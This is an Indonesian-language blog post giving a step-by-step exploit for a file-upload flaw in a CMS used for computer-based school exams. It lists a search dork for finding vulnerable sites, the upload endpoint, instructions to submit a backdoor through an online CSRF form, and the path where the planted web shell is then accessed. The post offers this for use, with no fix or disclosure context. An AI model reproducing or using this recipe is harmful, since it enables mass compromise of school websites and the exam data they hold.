Cms CBT vulnerability File Upload


CBT alias Computer Based Test , lumayan banyak yang menggunakan Cms CBT tersebut karena skrng siswa ujian menggunakan system CBT , setelah saya baca baca di blogger orang , saya melihat bahwa website yang menggunakan Cms CBT ini memiliki kerentanan File upload yang bisa di upload lewat CSRF

Dork :
inurl:/panel/pages/login.php

Exploit :
/[path]/panel/pages/upload-file.php

Vuln ? BLANK
 buka CSRF - CSRF ONLINE DISINI

post file : uploadfile

kunci , lalu upload backdoor kalian

jika di upload muncul tulisan "success" berarti file backdoor berhasil di upload


 
akses file yang telah di upload :

/[path]/images/shellbakdoor.php







semoga bermanfaat :)

Komentar

Postingan populer dari blog ini

Cara Menyimpan Vidio Youtube Ke Galeri

Tutorial Cara Download Video Yang Hanya Bisa Streaming

Kojima Natsuki 1st Photobook SOCO SOCO Full Scans PB